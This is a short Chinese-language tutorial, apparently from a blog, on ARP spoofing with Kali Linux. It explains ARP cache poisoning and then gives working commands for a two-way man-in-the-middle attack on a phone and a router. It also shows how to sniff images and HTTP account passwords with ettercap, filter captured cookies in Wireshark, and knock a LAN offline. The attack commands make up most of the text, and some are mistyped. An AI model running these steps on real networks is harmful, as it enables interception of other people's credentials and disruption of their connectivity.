准备

  • Kali 2.0+
  • 虚拟机网络设置为“桥接模式”bridged

原理

地址解析协议,即ARP(Address Resolution Protocol)
在网络的第二层,Mac和IP需要一个映射关系,才能让第一层的物理机的Mac和第三层的网络IP一一对应。ARP缓存就是来存放这个映射表的。设A机IP为ipA,Mac地址为macA,B机(路由器)的IP为ipB,Mac地址为macB,攻击者C机,ipc和macC。
将A机的ARP缓存中,ipB映射为macC,那么A机所有发出的报文都发给了C机。
同理B路由器的ARP缓存中,ipA映射为macC,那么B路由器发出的数据都给了C机。
这时C机再打开数据转发,那么不影响A与B的通讯,但是获得了数据。这是简单的中间人攻击。
使ARP混乱也能让局域网断网。

实验

手机(受害者)ip192.168.2.204
路由器ip192.168.2.1
攻击机 ip192.168.2.213

在Kali虚拟机 的终端A操作

1
2
3
4
arp -a //查询ARP缓存情况
ifconfig //查询网络参数
system net.ipv4.ip_forward=1 //开启ipv4的IP转发
arpspoof -t 192.168.2.204 -i eth0 -r -c own 192.168.2.1//双向欺骗

在其他终端你可以

1
2
3
drifnet //嗅探图片
ettercap -Tq -i eth0 //嗅探帐号密码 http有效
wireshark //抓包 分析工具

wireshark filter 可以输入 ip.src==192.168.2.1 and http 抓取cookie

断网攻击

1
arpspoof -i eth0 192.168.2.1 //仅仅网关广播